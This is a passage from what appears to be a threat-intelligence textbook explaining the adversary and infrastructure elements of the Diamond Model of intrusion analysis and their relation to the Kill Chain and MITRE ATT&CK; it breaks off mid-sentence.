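Filling in a record like this for each event makes it easier to compare events across a campaign and to spot which elements (for example, shared infrastructure) link them together.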
This element describes the threat actor involved in the campaign, whether directly or indirectly. This can include individual names, organizations, monikers, handles, social media profiles, code names, addresses (physical, email, and so on), telephone numbers, employers, network-connected assets, and so on. Essentially, these are the features you can use to describe the bad guy.
Important note
Network-connected assets can fall into either an adversary or infrastructure node depending on the context. A computer named cruisin-box may be used by the adversary for leisure activities on the internet and be used to describe the person, while hax0r-box may be used by the adversary for network attack and exploitation campaigns and be used to describe the attack infrastructure.
This element describes the adversary-controlled infrastructure leveraged in the campaign. This can include things such as IP addresses, hostnames, domain names, email addresses, network-connected assets, and so on. As we track the life cycle of the campaign and map the Diamond Model to the Lockheed Martin Kill Chain, and even to MITRE's ATT&CK matrices, infrastructure can start as an external entity but quickly become an internal one.
This element
